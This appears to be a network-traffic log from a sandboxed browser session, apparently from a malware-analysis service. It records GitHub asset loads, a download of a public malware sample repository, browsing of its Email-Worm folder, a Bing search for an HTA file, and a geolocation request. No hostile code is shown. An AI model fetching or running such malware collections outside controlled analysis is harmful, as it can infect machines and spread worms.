GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-56e2d9924e94.js

HTTP Request

GET https://github.githubassets.com/assets/sessions-730dca81d0a2.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_es_mjs-dd1d3ea6a436.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-40531a-09af0ef9a562.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-17c672-34345cb18aac.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-5e577baa9efd.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-7496afc3784d.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-762eaa-c6c7f3dd0990.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-file-page-payload_ts-ui_packages_hydro-analytics_hydro-fedf97-6005b51c40ca.js

HTTP Request

GET https://github.githubassets.com/assets/repos-overview-4716c48fca22.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-dbc875e76b97.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-670c71d392c6.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-abc100eaa2cb.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-b492d6900d5e.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-91468a3354f9.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-880f27a93f7b.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-cf531d29cf91.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-8ca582ddd98a.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-04338159da93.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-37a12a0ee62c.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-c4e5a9b4f95a.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-cd101f502904.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/react-code-view.a0633e3d36c876a6eaa1.module.css

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_diffs_diff-parts_ts-ui_packages_use-file-tree-tooltip_use-file-tree-tooltip_ts-ui-db0a92-6a1f23f93999.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_utili-04c5c0-190ff749ae90.js

HTTP Request

GET https://github.githubassets.com/assets/react-code-view-8aa6620a8c56.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/commits.ec4e44e924b297faabce.module.css

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_date-fns_format_mjs-6e4d0f904632.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_date-fns_addWeeks_mjs-node_modules_date-fns_addYears_mjs-node_modules_da-827f4f-cf37cd06c24f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_react-relay_index_js-3e4c69718bad.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_focus-visible_dist_focus-visible_js-node_modules_fzy_js_index_js-node_mo-39e45c-b30cde6f79f8.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules_date-fns_getDaysInMonth_mjs-nod-70c11b-75afe0f5c344.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-cff384-b7d3c96e5f18.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_react-relay_hooks_js-node_modules_color2k_dist_index_exports_import_es_m-05025c-dd04247c9c77.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_react-query_build_modern_useMutation_js-node_modules_tanstack_r-8c7f45-61a93e5806f6.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_hydro-analytics-f409df-2c9bc8e4459c.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_list-view_src_ListItem_ListItem_tsx-ui_packages_list-view_src_ListItem_Title_tsx--68e5b9-4bb2727ac420.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_date-picker_date-picker_ts-ui_packages_github-avatar_GitHubAvatar_tsx-df9548397fca.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_item-picker_constants_labels_ts-ui_packages_item-picker_constants_values_ts-ui_pa-163a9a-f372d973c79c.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_item-picker_components_RepositoryPicker_tsx-3840f58896cc.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_comment-box_api_file-upload_ts-ui_packages_comment-box_api_preview_ts-ui_packages-bc8aaa-9c22832d922e.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_issue-create_dialog_CreateIssueDialogEntry_tsx-f3c8852f25fb.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_signed-commit-badge_index_ts-ui_packages_use-navigate_use-navigate_ts-7d3b385f92f0.js

HTTP Request

GET https://github.githubassets.com/assets/commits-be407469628b.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_commits_components_Commits_CommitActionBar_tsx.73968ade99940a102d47.module.css

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_commits_components_Commits_CommitActionBar_tsx-02aa91c41168.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_catalyst_lib_index_-280e4f-f7d6cfa05e86.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hydro--09cdca-c8338d3c4dc8.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-b8c0ea-90d580abff98.js

HTTP Request

GET https://github.githubassets.com/assets/diffs-76da528a8b4c.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
185.199.108.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.108.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.108.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.108.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.108.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.111.133:443

avatars.githubusercontent.com

tls

msedge.exe

1.1kB
6.3kB
12
10
140.82.113.22:443

https://collector.github.com/github/collect

tls, http2

msedge.exe

45.3kB
18.9kB
94
87

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204
185.199.108.154:443

https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

tls, http2

msedge.exe

2.4kB
24.9kB
25
35

HTTP Request

GET https://github.githubassets.com/favicons/favicon.svg

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/favicons/favicon.png

HTTP Request

GET https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

HTTP Response

200

HTTP Response

200
140.82.113.22:443

collector.github.com

msedge.exe

98 B
52 B
2
1
20.26.156.210:443

https://api.github.com/_private/browser/stats

tls, http2

msedge.exe

9.2kB
6.7kB
23
23

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200
20.26.156.216:443

https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master

tls, http2

msedge.exe

3.9MB
218.1MB
83666
156117

HTTP Request

GET https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master

HTTP Response

200
20.26.156.215:443

https://github.com/Da2dalus/The-MALWARE-Repo/deferred-metadata/master/Email-Worm

tls, http2

msedge.exe

3.9kB
71.3kB
43
68

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/latest-commit/master/Email-Worm

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/tree-commit-info/master/Email-Worm

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/deferred-metadata/master/Email-Worm

HTTP Response

200

HTTP Response

200

HTTP Response

200
20.26.156.210:443

https://api.github.com/_private/browser/stats

tls, http2

msedge.exe

2.9kB
5.4kB
15
16

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200
20.26.156.215:443

https://github.com/commits/badges

tls, http2

msedge.exe

7.0kB
119.3kB
70
114

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/commits/deferred_commit_contributors

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/commits/deferred_commit_data/master?original_branch=master&path=Email-Worm

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311

HTTP Response

200

HTTP Request

GET https://github.com/Da2dalus/The-MALWARE-Repo/branch_commits/aca60d9e92246e1c13242054f907baaac913c311

HTTP Request

POST https://github.com/commits/badges

HTTP Response

200

HTTP Response

200
20.26.156.210:443

https://api.github.com/_private/browser/stats

tls, http2

msedge.exe

4.1kB
6.8kB
21
23

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200
88.221.135.33:443

www.bing.com

tls, http2

msedge.exe

1.0kB
5.1kB
9
11
88.221.135.33:443

https://www.bing.com/fd/ls/lsp.aspx

tls, http2

msedge.exe

74.6kB
444.0kB
401
484

HTTP Request

GET https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.HeaderScopeOrder%22,%22FID%22:%22CI%22,%22Name%22:%22ScopeMapOrderValue%22,%22Text%22:%220%3A0%2C1%3A1%2C2%3A2%2C3%3A3%2C4%3A4%2C5%3A5%2C6%3A6%2C8%3A7%2C7%3A8%2C9%3A9%22,%22SDK%22:%22SJ%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:69,%22BC%22:337,%22SE%22:-1,%22TC%22:-1,%22H%22:430,%22BP%22:431,%22CT%22:434,%22IL%22:2},%22ad%22:[-1,-1,1263,601,1263,2731,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

GET https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/rp/l-yS6iZ5vQqwJ9ur5vosaqxfLGQ.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.4.3/js/widget.js?t=250311

HTTP Request

GET https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png

HTTP Request

GET https://www.bing.com/geolocation/write?isDevLoc=false&lat=53.5682487487793&lon=-2.491116523742676&dispName=Bolton%252C%2520Greater%2520Manchester&isEff=1&effLocType=4&clientsid=undefined

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1741747022402%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%2210%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1741747022402%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022427%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022429%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022429%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

HTTP Request

GET https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg

HTTP Request

GET https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg

HTTP Request

GET https://th.bing.com/th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=18&h=18&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.78157401-198f-4ceb-88f3-08ecac8426aa&w=18&h=18&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.704ab8bf-202e-4c2b-bc42-3582515e3227&w=16&h=16&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=16&h=16&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=16&h=16&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.704ab8bf-202e-4c2b-bc42-3582515e3227&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022431%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022433%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022439%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1741747022453%2C%22Name%22%3A553%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022458%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022461%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022463%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022463%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1741747022464%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.20611289-3a68-44f4-ab60-d31c34214326&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=16&h=16&c=7&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=16&h=16&c=7&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=ODLS.20d00b2f-22fa-4116-935b-82c9369365fd&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1741747022680%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

HTTP Request

GET https://th.bing.com/th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2220%22,%22SDK%22:%22SJ%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=C6B6495D728647ADA3098FCFDAE1CBA9&iid=.5100&ptn=Web&ep=0&iconpl=1

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022777%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1741747022953%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1266%2C%22time%22%3A1267%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1741747022957%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1269%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1741747022958%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1269%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1741747022959%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=54406577&IID=SERP.5055&IG=C6B6495D728647ADA3098FCFDAE1CBA9

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=C6B6495D728647ADA3098FCFDAE1CBA9&IID=SERP.5065&q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

